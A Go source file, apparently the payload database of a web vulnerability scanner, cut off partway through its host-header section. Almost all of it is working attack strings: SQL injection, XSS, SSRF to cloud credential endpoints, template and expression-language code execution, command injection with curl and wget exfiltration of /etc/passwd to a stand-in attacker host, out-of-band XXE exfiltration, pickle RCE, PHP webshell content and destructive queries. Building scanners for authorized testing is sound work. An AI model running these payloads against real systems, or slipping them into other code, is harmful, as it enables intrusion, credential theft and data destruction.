package payloads

// categoryPayloads is the curated payload database. Payloads are grouped by
// vulnerability class and ordered from most common to most exotic so callers
// that truncate long result sets keep the highest-value entries.
//
// Sources of truth: PayloadsAllTheThings, OWASP WSTG examples, PortSwigger
// Web Security Academy methodology, and public bug-bounty triage knowledge —
// all standard references for authorized security testing.
var categoryPayloads = map[Category]payloadSet{
	CategorySQLi: {
		description: "SQL injection: error-based, boolean-blind, time-based, UNION, stacked queries, WAF evasion (inline comments, char encoding)",
		base: []string{
			"' OR '1'='1",
			"' OR '1'='1' --",
			"' OR '1'='1' /*",
			"' OR 1=1 --",
			"' OR 1=1 #",
			"\" OR 1=1 --",
			"') OR ('1'='1",
			"')) OR (('1'='1",
			"' UNION SELECT NULL --",
			"' UNION SELECT NULL,NULL --",
			"' UNION SELECT NULL,NULL,NULL --",
			"' UNION SELECT @@version,NULL,NULL --",
			"' UNION SELECT table_name,NULL FROM information_schema.tables --",
			"' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users' --",
			"' UNION SELECT username,password FROM users --",
			"' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --",
			"' AND 1=1 --",
			"' AND 1=2 --",
			"' AND SLEEP(5) --",
			"'; WAITFOR DELAY '0:0:5' --",
			"' AND (SELECT pg_sleep(5)) --",
			"' || pg_sleep(5) --",
			"'; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END --",
			"' AND SUBSTRING(version(),1,1)='1",
			"' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 1),1,1))>64 --",
			"'; DROP TABLE users --",
			"'; EXEC xp_cmdshell('ping 127.0.0.1') --",
			"1; SELECT pg_read_file('/etc/passwd')",
			"admin'--",
			"admin' #",
			"'||'",
			"'||''||'",
			"'+'+",
			"%27 OR %271%27=%271",
			"' /*!OR*/ 1=1 --",
			"' UNION/*!SELECT*/NULL,NULL--",
			"' uni%23on+se%23lect null,null --",
			"1' ORDER BY 1-- -",
			"1' ORDER BY 10-- -",
			"' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version()),0x7e)) --",
			"' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1) --",
			"1 OR 1=1",
			"1'1",
			"-1' and 1=1 union all select 1,2,3,4,5 --",
			"' HAVING 1=1 --",
			"' GROUP BY table_name HAVING 1=1 --",
			"$sqlite_version$",
			"1' and typeof((select 1))='integer'--",
		},
	},
	CategoryXSS: {
		description: "Cross-site scripting: reflected, stored, DOM, filter evasion, event handlers, SVG, mutation payloads, csp-safe probes",
		base: []string{
			"<script>alert(1)</script>",
			"<script>alert(document.domain)</script>",
			"<img src=x onerror=alert(1)>",
			"<svg onload=alert(1)>",
			"<svg/onload=alert(1)>",
			"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
			"<body onload=alert(1)>",
			"<input autofocus onfocus=alert(1)>",
			"<select autofocus onfocus=alert(1)>",
			"<textarea autofocus onfocus=alert(1)>",
			"<marquee onstart=alert(1)>",
			"<video><source onerror=alert(1)>",
			"<audio src=x onerror=alert(1)>",
			"<details open ontoggle=alert(1)>",
			"<iframe src=javascript:alert(1)>",
			"<a href=javascript:alert(1)>click</a>",
			"<a href=\"javas&#99;ript:alert(1)\">click</a>",
			"<math><mtext><table><mglyph><style><!--</style><img title=--></mglyph><img src=1 onerror=alert(1)>-->",
			"<xss id=x tabindex=1 onactivate=alert(1)></xss>",
			"<object data=javascript:alert(1)>",
			"<embed src=javascript:alert(1)>",
			"<form><button formaction=javascript:alert(1)>click",
			"<isindex type=image src=1 onerror=alert(1)>",
			"<script src=data:text/javascript,alert(1)></script>",
			"><script>alert(1)</script>",
			"\"></script><script>alert(1)</script>",
			"'</script><script>alert(1)</script>",
			"--><script>alert(1)</script>",
			"javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
			"<img src=\"x` `<script>alert(1)</script>\"` `>",
			"<img src=x:alert(alt) onerror=eval(src) alt=1>",
			"<script>{alert(1)}</script>",
			"<script>alert(/1/)</script>",
			"<script>confirm(1)</script>",
			"<script>prompt(1)</script>",
			"<scr<script>ipt>alert(1)</scr</script>ipt>",
			"<img src=x onerror=\"alert&#40;1&#41;\">",
			"<img src=x onerror=alert&#40;1&#41;>",
			"%3Cscript%3Ealert(1)%3C/script%3E",
			"<img src=x:x onerror=alert(1)//>",
			"'\"><img src=x onerror=prompt(1)>",
			"{{constructor.constructor('alert(1)')()}}",
			"<style>@import'javascript:alert(1)';</style>",
			"<link rel=import href=\"data:text/html,<script>alert(1)</script>\">",
			"<meta http-equiv=\"refresh\" content=\"0;javascript:alert(1)\">",
			"<base href=\"javascript:alert(1)//\">",
			"'.replace(/1/,alert(1))//",
			"<x onclick=alert(1)>click",
			"<x onpointerover=alert(1)>hover",
			"\" autofocus onfocus=alert(1) autofocus x=\"",
			"'-alert(1)-'",
			"';alert(1)//",
			"\\';alert(1)//",
			"</textarea><script>alert(1)</script>",
			"</title><script>alert(1)</script>",
			"</style><script>alert(1)</script>",
			"<template><script>alert(1)</script></template>",
			"<img src=1 href=1 onerror=\"javascript:alert(1)\">",
		},
	},
	CategorySSRF: {
		description: "Server-side request forgery: internal network probes, cloud metadata endpoints, redirect chains, DNS rebinding seeds, protocol smuggling (gopher/dict/file)",
		base: []string{
			"http://127.0.0.1/",
			"http://localhost/",
			"http://localhost:8080/",
			"http://[::1]/",
			"http://0.0.0.0/",
			"http://0177.0.0.1/",            // octal encoding of 127.0.0.1
			"http://2130706433/",            // decimal encoding of 127.0.0.1
			"http://0x7f000001/",            // hex encoding of 127.0.0.1
			"http://127.1/",
			"http://127.0.0.1.nip.io/",
			"http://localtest.me/",
			"http://metadata.google.internal/computeMetadata/v1/",
			"http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
			"http://169.254.169.254/latest/meta-data/",
			"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
			"http://169.254.169.254/metadata/v1/", // DigitalOcean
			"http://169.254.170.2/v2/credentials/", // ECS task metadata
			"http://100.100.100.200/latest/meta-data/", // Alibaba Cloud
			"http://168.63.129.16/machine/", // Azure WireServer
			"http://169.254.169.254/metadata/instance?api-version=2021-02-01", // Azure IMDS
			"file:///etc/passwd",
			"file:///c:/windows/win.ini",
			"file:///etc/shadow",
			"dict://127.0.0.1:6379/INFO",
			"gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A",
			"gopher://127.0.0.1:25/xHELO%20localhost",
			"http://internal-service.local/",
			"http://10.0.0.1/",
			"http://192.168.1.1/",
			"http://172.16.0.1/",
			"http://[fd00::1]/",
			"http://127.0.0.1%@evil.com/",
			"http://evil.com#@127.0.0.1/",
			"http://127.0.0.1@evil.com/",
			"http://evil.com%2F@127.0.0.1/",
			"http://127.0.0.1%252f.evil.com/",
			"https://127.0.0.1/",
			"gopher://127.0.0.1:11211/_%0d%0astats%0d%0a",
			"http://a:b@127.0.0.1:8080/",
			"webhook_site_placeholder", // replace with a unique webhook collaborator URL for OOB detection
			"http://burp_collaborator_placeholder", // replace with a collaborator/polling host for OOB callbacks
		},
	},
	CategorySSTI: {
		description: "Server-side template injection probes per engine (Jinja2, Twig, Freemarker, Velocity, ERB, Mako, Pebble, Thymeleaf, Smarty) with RCE follow-ups",
		base: []string{
			"{{7*7}}",
			"{{7*'7'}}",
			"${7*7}",
			"#{7*7}",
			"<%= 7*7 %>",
			"{{7*7}}${7*7}<%= 7*7 %>${7*7}#{7*7}",
			"{{config}}",
			"{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}",
			"{{''.__class__.__mro__[2].__subclasses__()}}",
			"{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}",
			"{% for x in ().__class__.__base__.__subclasses__() %}{% if \"warning\" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen('id').read()}}{% endif %}{% endfor %}",
			"{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}",
			"{{lipsum.__globals__['os'].popen('id').read()}}",
			"{{cycler.__init__.__globals__.os.popen('id').read()}}",
			"{{joiner.__init__.__globals__.os.popen('id').read()}}",
			"{{namespace.__init__.__globals__.os.popen('id').read()}}",
			"{{7*7}}${7*7}",
			"${{7*7}}",
			"#{7*7}#{",
			"*{7*7}", // Thymeleaf
			"__${7*7}__::", // Thymeleaf preprocessing
			"{{ 7*7 }}", // Pebble / generic
			"{{settings.SECRET_KEY}}",
			"{{''.join(c for c in 'secret')}}",
			"{php}echo `id`;{/php}", // Smarty
			"{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,\"<?php system('id'); ?>\",self::clearConfig())}",
			"<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}", // Freemarker
			"[#assign ex=\"freemarker.template.utility.Execute\"?new()]${ex(\"id\")}",
			"${\"freemarker.template.utility.Execute\"?new()(\"id\")}",
			"#set($x=7*7)${x}", // Velocity
			"#set($str=$class.newInstance('java.lang.String'))#set($exec=$str.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('id'))",
			"<%= system('id') %>", // ERB
			"<%= File.open('/etc/passwd').read %>",
			"${7*7} ${T(java.lang.Runtime)}", // Spring EL
			"${T(java.lang.Runtime).getRuntime().exec('id')}",
			"*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}",
			"${#rt = @java.lang.Runtime@getRuntime(),#rt.exec('id')}", // OGNL
			"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Test')}", // Struts
			"{{_self.env.registerUndefinedFilterCallback(\"exec\")}}{{_self.env.getFilter(\"id\")}}", // Twig
			"{{['id']|filter('system')}}",
			"{{['id']|map('system')}}",
			"{{dump(app)}}",
			"{{app.request.server.all|join(',')}}",
			"{{constructor.constructor('return process.mainModule.require(\"child_process\").execSync(\"id\").toString()')()}}", // Nunjucks / JS
		},
	},
	CategoryCmdInjection: {
		description: "OS command injection: separators, blind time-based, out-of-band, quoted-context breakouts, filter evasion (IFS, $(), backticks)",
		base: []string{
			"; id",
			"& id",
			"&& id",
			"| id",
			"|| id",
			"\nid",
			"id\n",
			"`id`",
			"$(id)",
			";id",
			"|id",
			"&&id",
			"; id;",
			"| id |",
			"&& id &&",
			"; sleep 5",
			"& sleep 5 &",
			"| sleep 5",
			"&& sleep 5",
			"`sleep 5`",
			"$(sleep 5)",
			"'; sleep 5 #",
			"\"; sleep 5 #",
			"'; }`sleep 5`{ #", // quoted context escape
			"' `sleep 5` '",
			"; ping -c 5 127.0.0.1",
			"& ping -n 5 127.0.0.1 &",
			"; cat /etc/passwd",
			"| cat /etc/passwd",
			"; type C:\\Windows\\win.ini",
			"&& type C:\\Windows\\win.ini",
			"& type C:\\Windows\\win.ini &",
			"; nslookup attacker.oob.example",
			"`nslookup attacker.oob.example`",
			"$(nslookup attacker.oob.example)",
			"& nslookup attacker.oob.example &",
			";curl http://attacker.oob.example/$(whoami)",
			"|wget http://attacker.oob.example/?data=$(cat /etc/passwd|base64)",
			"$(cat /etc/passwd)",
			";{id}",
			"{ id; }",
			"; id #",
			"() { :;}; /bin/bash -c \"id\"", // Shellshock
			"() { :;}; echo CGI-SHELLSHOCK-TEST",
			"|%0 Aid",
			";%0Aid",
			"%0d%0aid",
			"${IFS}id",
			";${IFS}id",
			"$cat$/etc/passwd",
			"cat${IFS}/etc/passwd",
			"cat$u/etc/passwd",
			"a;id#",
			"'||id||'",
			"| id #",
			"`,id`",
		},
	},
	CategoryPathTraversal: {
		description: "Path traversal / LFI / RFI: dot-dot sequences with encodings, null bytes, filter bypasses, Windows variants, wrapper abuse (php://, data://, expect://)",
		base: []string{
			"../../../etc/passwd",
			"../../../../etc/passwd",
			"../../../../../etc/passwd",
			"../../../../../../etc/passwd",
			"../../../../../../../../etc/passwd",
			"/etc/passwd",
			"....//....//....//etc/passwd",
			"..//..//..//etc/passwd",
			"..%2f..%2f..%2fetc%2fpasswd",
			"..%252f..%252f..%252fetc%252fpasswd",
			"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
			"%2e%2e/%2e%2e/%2e%2e/etc/passwd",
			"..\\..\\..\\windows\\win.ini",
			"....\\....\\....\\boot.ini",
			"..%5c..%5c..%5cwindows%5cwin.ini",
			"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd", // overlong UTF-8
			"../../etc/passwd%00",
			"../../../etc/passwd%00.html",
			"../../../etc/passwd%00.jpg",
			"/./././././etc/passwd",
			"/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
			"/nonexistent/../../etc/passwd",
			"php://filter/convert.base64-encode/resource=/etc/passwd",
			"php://filter/read=convert.base64-encode/resource=index.php",
			"php://input",
			"data://text/plain,<?php echo shell_exec('id'); ?>",
			"data://text/plain;base64,PD9waHAgZWNobyBzaGVsbF9leGVjKCdpZCcpOyA/Pg==",
			"expect://id",
			"phar://test.phar",
			"zip://test.zip#test.txt",
			"/proc/self/environ",
			"/proc/self/cmdline",
			"/proc/self/fd/0",
			"/var/log/apache2/access.log",
			"/var/log/nginx/access.log",
			"/var/log/auth.log",
			"C:\\Windows\\system.ini",
			"\\\\localhost\\c$\\windows\\win.ini", // UNC / SMB
			"file:///etc/passwd",
			"https://evil.com/shell.txt", // RFI probe
			"http://evil.com/shell.txt?",
		},
	},
	CategoryXXE: {
		description: "XML external entity injection: file disclosure, SSRF via entity, parameter entities, OOB exfiltration, XInclude, SVG/docx/xlsx embedded XXE",
		base: []string{
			"<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>",
			"<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><root>&xxe;</root>",
			"<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/\">]><root>&xxe;</root>",
			"<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY xxe SYSTEM \"http://oob.collaborator.placeholder/xxe\">]><root>&xxe;</root>",
			"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=/etc/passwd\">]><root>&xxe;</root>",
			"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"expect://id\">]><foo>&xxe;</foo>",
			"<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"file:///etc/passwd\"><!ENTITY % wrapper \"<!ENTITY send SYSTEM 'http://oob.collaborator.placeholder/?data=%xxe;'>\">%wrapper;%send;]><foo/>",
			"<?xml version=\"1.0\"?><!DOCTYPE data [<!ENTITY % file SYSTEM \"file:///etc/hostname\"><!ENTITY % dtd SYSTEM \"http://oob.collaborator.placeholder/evil.dtd\">%dtd;%send;]><data/>",
			"<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include href=\"file:///etc/passwd\" parse=\"text\"/></foo>", // XInclude
			"<?xml version=\"1.0\"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><svg xmlns=\"http://www.w3.org/2000/svg\"><text>&xxe;</text></svg>",
			"<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY xxe SYSTEM \"file:///%SYSTEMDRIVE%/windows/win.ini\">]><x>&xxe;</x>",
			"<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY xxe SYSTEM \"jar:http://evil.com/!file:///etc/passwd\">]><r>&xxe;</r>",
			"<?xml version=\"1.0\"?><!DOCTYPE r [<!ENTITY % a SYSTEM \"file:///etc/passwd\"><!ENTITY % b \"<!ENTITY c SYSTEM 'ftp://%a;'>\">%b;%c;]><r/>",
		},
	},
	CategoryLDAP: {
		description: "LDAP injection: filter breakouts for auth bypass and attribute enumeration",
		base: []string{
			"*",
			"*)(&",
			"*)(uid=*))(|(uid=*",
			"*)(|(password=*)",
			"*)(objectClass=*",
			"*)(cn=*)|(cn=*",
			"admin*)(&",
			"*()|%26'",
			"*)(mail=*))(%00",
			"*)(!(&(=*))",
			"*(|(objectClass=*)",
			")(|(cn=*",
			"\\2a\\29\\28",
			"%2A%29%28",
			"*)(uid=*))((|uid=*",
		},
	},
	CategoryNoSQL: {
		description: "NoSQL injection (MongoDB focus): operator injection ($gt/$ne/$regex), JSON and query-string variants, auth bypass, blind extraction",
		base: []string{
			"[$ne]=1",
			"[$gt]=",
			"[$regex]=.*",
			"[$regex]=^a",
			"[$where]=1==1",
			"[$where]=sleep(5000)",
			"[$exists]=true",
			"[$ne]=null",
			"[$nin]=[]",
			"[$or]=[{},{}]",
			"{\"$ne\":null}",
			"{\"$gt\":\"\"}",
			"{\"$regex\":\".*\"}",
			"{\"$where\":\"sleep(5000)\"}",
			"{\"$where\": \"this.password.match(/.*/)\"}",
			"username[$ne]=toto&password[$ne]=toto",
			"username[$regex]=^admin&password[$gt]= ",
			"login[$ne]=1&pass[$ne]=1",
			"' || 1==1//",
			"' || this.username.match(/.*/)==null//",
			"';return true//",
			"admin'||''||'",
			"{$where: '1 == 1'}",
			"db.users.find({$where: function() { return true }})",
			"[$function]=function(){return true}",
			"[$jsonSchema]={}",
		},
	},
	CategoryOpenRedirect: {
		description: "Open redirect: absolute URLs, scheme variants, protocol-relative, encoded bypasses, allowlist confusions",
		base: []string{
			"https://evil.com",
			"http://evil.com",
			"//evil.com",
			"///evil.com",
			"////evil.com",
			"https:/evil.com",
			"https:evil.com",
			"\\/\\/evil.com",
			"/\\evil.com",
			"//127.0.0.1",
			"javascript:alert(1)",
			"data:text/html,<script>alert(1)</script>",
			"vbscript:msgbox(1)",
			"https://evil.com#https://trusted.com",
			"https://trusted.com@evil.com",
			"https://evil.com?@trusted.com",
			"https://trusted.com.evil.com",
			"https://trusted.com%2f.evil.com",
			"/redirect?url=https://evil.com",
			"?next=//evil.com",
			"%2F%2Fevil.com",
			"%252F%252Fevil.com",
			"https%3A%2F%2Fevil.com",
			"//evil%2ecom",
			"https://evil.com&ip=127.0.0.1",
		},
	},
	CategoryCRLF: {
		description: "CRLF injection / HTTP response splitting: header injection, session fixation, cache poisoning via CR/LF in parameters",
		base: []string{
			"%0d%0aX-Injected: 1",
			"%0d%0aSet-Cookie: injected=1",
			"%0d%0aLocation: https://evil.com",
			"%0d%0a%0d%0a<html><body>injected</body></html>",
			"%0aX-Injected: 1",
			"\r\nX-Injected: 1",
			"%0d%0aContent-Length: 0",
			"%0d%0aX-Forwarded-Host: evil.com",
			"%0d%0aContent-Type: text/html",
			"%0d%0aContent-Length: 35%0d%0aX-Ignored: ",
			"%2e%2e%2f%0d%0aX-Injected: 1",
			"%E5%98%8A%E5%98%8DX-Injected: 1", // unicode newline variants
			"%E5%98%8A%E5%98%8DSet-Cookie: injected=1",
		},
	},
	CategoryHeaderInjection: {
		description: "HTTP header injection for infrastructure exploitation: X-Forwarded-For, X-Original-URL, X-Rewrite-URL, relay abuse, IP spoofing vectors",
		base: []string{
			"X-Forwarded-For: 127.0.0.1",
			"X-Forwarded-Host: 127.0.0.1",
			"X-Forwarded-Proto: https",
			"X-Originating-IP: 127.0.0.1",
			"X-Remote-Addr: 127.0.0.1",
			"X-Client-IP: 127.0.0.1",
			"X-Real-IP: 127.0.0.1",
			"X-Original-URL: /admin",
			"X-Rewrite-URL: /admin",
			"X-HTTP-Method-Override: DELETE",
			"X-Custom-IP-Authorization: 127.0.0.1",
			"X-ProxyUser-Ip: 127.0.0.1",
			"Fastly-Client-IP: 127.0.0.1",
			"True-Client-IP: 127.0.0.1",
			"CF-Connecting-IP: 127.0.0.1",
			"Referer: https://admin.internal/",
			"X-Request-ID: ../../admin",
		},
	},
	CategoryJWT: {
		description: "JWT attacks: alg:none, key confusion, kid injection (SQLi/path traversal/command), jku/x5u takeover, blank password signature, claim tampering",
		base: []string{
			"alg:none-strip-signature", // placeholder handled by engine: rebuild header {\"alg\":\"none\"}
			"alg:HS256-confusion-key",  // placeholder handled by engine: sign with public key as HMAC secret
			"kid:path-traversal:/dev/null",
			"kid:sql-injection:' UNION SELECT 'secret' -- ",
			"kid:command-injection:$(id)",
			"jku:attacker-controlled-jwk-set",
			"x5u:attacker-controlled-cert-url",
			"iss-spoofing:null-issuer",
			"role-escalation:admin-claim-injection",
			"exp-removal:never-expires",
			"signature-not-verified-check", // detector hint: tamper payload and replay
		},
	},
	CategoryDeserialization: {
		description: "Insecure deserialization: Java (URLDNS, Commons-Collections), PHP (phar, POP chains), Python (pickle), .NET (ViewState, ysoserial.net), Ruby (Marshal)",
		base: []string{
			"rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==", // java serialized object magic (base64 of 0xACED0005)
			"aced0005",                               // java serialization magic hex
			"URLDNS-marker-placeholder",              // ysoserial URLDNS gadget: replace with generated payload for OOB DNS callback
			"CommonsCollections1-marker-placeholder", // ysoserial CC1: replace with generated gadget
			"CommonsCollections5-marker-placeholder",
			"CommonsCollections6-marker-placeholder",
			"O:8:\"stdClass\":0:{}", // php object injection probe
			"O:7:\"Hacker\":0:{}",
			"a:2:{s:4:\"user\";s:5:\"admin\";s:4:\"role\";s:5:\"admin\";}",
			"TzoyMDoiU3lzX0Rlc2VyaWFsaXplX0RlYnVnIjoxOntzOjQ6ImRhdGEiO3M6NDoiaGFjaCI7fQ==",
			"gASV-placeholder", // python pickle magic 0x80 0x04 0x95
			"\x80\x04\x95cos\nsystem\nVid\n\x85R.", // pickle RCE (raw)
			"BAh (^ruby Marshal 4.8 magic)",
			"/wEyplaceholder", // .NET ViewState
			"phar://uploads/image.jpg", // phar deserialization
			"__proto__:{\"isAdmin\":true}",
		},
	},
	CategoryPrototypePollution: {
		description: "JavaScript prototype pollution: __proto__ / constructor.prototype via query, JSON body, and various key-path syntaxes",
		base: []string{
			"__proto__[admin]=true",
			"__proto__[isAdmin]=1",
			"constructor[prototype][admin]=true",
			"__proto__=true",
			"{\"__proto__\":{\"admin\":true}}",
			"{\"constructor\":{\"prototype\":{\"admin\":true}}}",
			"?__proto__[status]=510",
			"?__proto__[shell]=NODE_OPTIONS",
			"__proto__[innerHTML]=<img src=x onerror=alert(1)>",
			"params[__proto__][x]=y",
			"settings[__proto__][theme]=dark",
			"config[__proto__][proto_polluted]=1",
			"[__proto__][polluted]=true",
			"%5F%5Fproto%5F%5F[polluted]=true", // url-encoded underscores
		},
	},
	CategoryTemplateInjection: {
		description: "Client-side template injection (Angular, Vue, Mavo) distinct from server-side SSTI",
		base: []string{
			"{{constructor.constructor('alert(1)')()}}",
			"{{7*7}}",
			"{{'a'.constructor.prototype.charAt=[].join}}",
			"{{[$eval.constructor('alert(1)')()]}}",
			"[[constructor.constructor('alert(1)')()]]", // Aurelia
			"{{this.__proto__.constructor.constructor('alert(1)')()}}",
			"{{{constructor.constructor('alert(1)')()}}}", // Vue 2
			"{{_c.$options.sandbox.constructor.constructor('alert(1)')()}}",
			"{7*7}", // Mavo
		},
	},
	CategoryGraphQL: {
		description: "GraphQL attack vectors: introspection, field suggestion mining, batching abuse, depth bombs, alias-based brute force, mutation abuse",
		base: []string{
			"{__schema{queryType{name}}}",
			"{__schema{types{name,fields{name}}}}",
			"{__schema{mutationType{name fields{name}}}}",
			"{__type(name:\"User\"){fields{name,type{name}}}}",
			"{user{id}}{user{id}}{user{id}}", // batching probe
			"query{__typename}",
			"{a:user(id:\"1\"){email}b:user(id:\"2\"){email}}",
			"{__schema{subscriptionType{name}}}",
			"mutation{login(user:\"admin\",pass:\"admin\"){token}}",
			"{user(id:\"1' OR '1'='1\"){email}}", // GraphQL-sQLi
			"query IntrospectionQuery { __schema { queryType { name } mutationType { name } subscriptionType { name } types { ...FullType } } } fragment FullType on __Type { kind name fields { name type { ...TypeRef } } } fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name } } }",
		},
	},
	CategoryFileUpload: {
		description: "File upload bypass vectors: double extensions, null bytes, content-type spoofing, polyglot files, path traversal in filename, blacklist evasion",
		base: []string{
			"shell.php",
			"shell.php.jpg",
			"shell.jpg.php",
			"shell.php%00.jpg",
			"shell.php;.jpg",
			"shell.phtml",
			"shell.pht",
			"shell.phar",
			"shell.php5",
			"shell.php7",
			"shell.sphp",
			"shell.asp",
			"shell.aspx",
			"shell.asa",
			"shell.cer",
			"shell.aspx;,.jpg",
			"shell.jsp",
			"shell.jspx",
			"shell.jsw",
			"shell.jsv",
			"shell.jspf",
			"../../shell.php",
			"..%2fshell.php",
			"shell.php%00.png",
			"%2e%2e%2f%2e%2e%2fshell.php",
			"SHELL.PHP", // case bypass
			"shell.PhP",
			"shell.php.",   // trailing dot (windows)
			"shell.php%20", // trailing space
			"shell.php::$DATA", // NTFS ADS
			"shell.php.......", // trailing dots
			"<?php system($_GET['c']); ?>", // php webshell content
			"GIF89a<?php system($_GET['c']); ?>", // polyglot gif+php
		},
	},
	CategorySmi: {
		description: "HTTP request smuggling probes: CL.TE, TE.CL, TE.TE differential detection, Content-Length conflicts, obfuscated Transfer-Encoding headers",
		base: []string{
			"CLTE:Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nX",
			"TECL:Transfer-Encoding: chunked\r\nContent-Length: 4\r\n\r\n1\r\nZ\r\nQ",
			"TETE:Transfer-Encoding: chunked\r\nTransfer-Encoding: xchunked\r\n\r\n0\r\n\r\n",
			"TEOB:Transfer-Encoding : chunked\r\n\r\n0\r\n\r\n", // space before colon
			"TETAB:Transfer-Encoding:\tchunked\r\n\r\n0\r\n\r\n",
			"TETF:Transfer-Encoding: chunked\r\nTransfer-Encoding: identity\r\n\r\n0\r\n\r\n",
			"CL0:Content-Length: 0\r\nContent-Length: 8\r\n\r\nsmuggled", // conflicting CL
			"CRM:Transfer-Encoding: chunked\r\n\r\n0\r\nX: x",
		},
	},
	CategoryCachePoisoning: {
		description: "Web cache poisoning/deception: unkeyed header reflection, fat GET, cache key confusion, X-Forwarded-Host abuse",
		base: []string{
			"X-Forwarded-Host: evil.com",
			"X-Host: evil.com",
			"X-Forwarded-Server: evil.com",
			"X-HTTP-Host-Override: evil.com",
			"Forwarded: host=evil.com",
			"X-Forwarded-Scheme: http", // scheme confusion
			"X-Original-URL: /poisoned",
			"X-Rewrite-URL: /poisoned",
			"Fat-GET-marker", // GET with body to confuse cache key
			"X-Query-Params: poisoned=1",
			"X-Cache-Key-Manipulation: value",
			"Accept-Encoding: identity;q=0", // vary confusion
			"Accept-Language: en-US;q=0.1,evil;q=1",
		},
	},
	CategoryRace: {
		description: "Race condition primitives: last-write-wins patterns to test (single-request multi-value, parallel duplicate requests)",
		base: []string{
			"single-packet-multi-value:send N=20 identical requests in one burst",
			"token-reuse:redeem same one-time token concurrently",
			"double-spend:parallel transfer/withdraw requests",
			"limit-bypass:parallel redemption/coupon application",
			"vote-abuse:parallel like/rating submissions",
			"withdraw-abuse:parallel balance draws",
			"email-claim-race:parallel email-verify + email-change",
			"password-reset-race:parallel reset-link reuse",
			"2fa-race:parallel OTP guesses against unlimited attempts window",
		},
	},
	CategoryAuthBypass: {
		description: "Authentication/authorization bypass probes: role tampering, mass assignment, API method confusion, path normalization bypasses",
		base: []string{
			"role=admin",
			"role=administrator",
			"isAdmin=true",
			"admin=true",
			"\"role\":\"admin\"",
			"\"isAdmin\":true",
			"userType=admin",
			"accessLevel=0",
			"X-Role: admin",
			"debug=true",
			"admin=1",
			"bypass=1",
			"internal=true",
			"%2e%2e/admin",
			"/./admin",
			"/;/admin",
			"/admin.json",
			"/admin%20",
			"/admin%2e",
			"/;/admin/dashboard",
			"GET-OPTIONS-probe", // OPTIONS/TRACE method probing hint
			"verb-tunneling:_method=GET&override=admin",
		},
	},
	CategoryIDOR: {
		description: "IDOR/BOLA testing hints: reference swapping patterns, sequential/guessable IDs, GUID leaks, method switches",
		base: []string{
			"userId=2",
			"account_id=2",
			"order_id=1001",
			"invoice_id=1001",
			"document_id=2",
			"user_id=1&target_user_id=2",
			"uuid-swap:replace-with-other-user-uuid",
			"email=other@user.com",
			"reference=sequential-probe-1..N",
			"method-switch:GET->PUT/PATCH/DELETE on same resource",
			"content-type-switch:application/json->text/plain on protected resource",
		},
	},
	CategoryExpression: {
		description: "Expression language injection (EL/OGNL/SpEL/MVEL): remote code execution probes per framework",
		base: []string{
			"${1+1}",
			"#{1+1}",
			"${T(java.lang.Runtime).getRuntime().exec('id')}",
			"%{#context['x'].exec('id')}",
			"${#rt=@java.lang.Runtime@getRuntime(),#rt.exec('id')}", // OGNL
			"#{T(java.lang.Runtime).getRuntime().exec('id')}", // SpEL
			"*{T(java.lang.Runtime).getRuntime().exec('id')}",
			"${sessionScope['k']}", // EL classic
			"${pageContext.request.servletPath}",
			"${applicationScope}",
			"${mvel.eval('Runtime.getRuntime().exec(\"id\")')}", // MVEL
			"${''.getClass().forName('java.lang.Runtime')}",
			"ognl:@java.lang.Runtime@getRuntime().exec('id')",
		},
	},
	CategoryHostHeader: {
		description: "Host header attacks: password reset poisoning, web cache poisoning, routing bypass, SSRF via Host",
		base: []string{
			"Host: evil.com",
			"Host: evil.com\r\nX-Real: 1",
			"Host: 127.0.0.1",
			"Host: localhost",
			"Host: internal.service",
			"Host: trusted.com.evil.com",
			"Host: evil.com@trusted.com",
			"X-Forwarded-Host: evil.com",
			"Host: trusted.com\r\nHost: evil.com", // duplicate host
			"Host: trusted.com:1337",
			"Host: [::1]",
			"absolute-uri:GET https://evil.com/ HTTP/1.1", // absolute URI form
